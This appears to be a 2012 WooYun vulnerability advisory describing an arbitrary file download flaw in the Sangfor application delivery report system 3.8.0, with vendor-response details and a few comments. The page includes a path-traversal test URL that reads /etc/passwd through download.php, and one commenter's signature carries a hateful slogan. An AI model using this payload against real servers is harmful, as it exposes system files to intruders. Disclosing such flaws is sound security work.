当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-012112

漏洞标题:深信服应用交付报表系统任意文件下载漏洞

相关厂商:深信服

漏洞作者: 7z1

提交时间:2012-09-13 18:09

修复时间:2012-09-18 18:10

公开时间:2012-09-18 18:10

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-09-13: 细节已通知厂商并且等待厂商处理中
2012-09-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

因程序设计上的缺陷,可任意下载文件,导致敏感信息泄露。

详细说明:

版本:SANGFOR-AD-3.8.0 (深信服应用交付报表系统3.8.0)
因download.php文件处理控制不当导致可跨目录下载任意文件。
测试url:http://www.site.cn:85/report/download.php?pdf=../../../../../etc/passwd

漏洞证明:

发现漏洞是因为授权测试遇到的,不提供存在漏洞的网站连接,sorry 。
test url : http://www.site.cn:85/report/download.php?pdf=../../../../../etc/passwd

修复方案:

对下载进行严格控制。

版权声明:转载请注明来源 7z1@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-09-18 18:10

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2012-09-19 09:52 | 木易木兆 ( 路人 | Rank:30 漏洞数:4 | 烧死异性恋!!!!!!!!!)

    游侠网登新闻都早一些呢。。。http://www.youxia.org/sangfor-ad-report-bug/

  2. 2012-09-19 15:05 | 7z1 ( 实习白帽子 | Rank:94 漏洞数:14 | 黑客:探险家、网络中的幽灵、用技术捍卫正...)

    @木易木兆 游侠哥转的~

  3. 2012-09-25 17:29 | 网路游侠 ( 路人 | Rank:20 漏洞数:2 | 不玩渗透好多年……)

    HOHO,乌云审核前,我转发的。哈。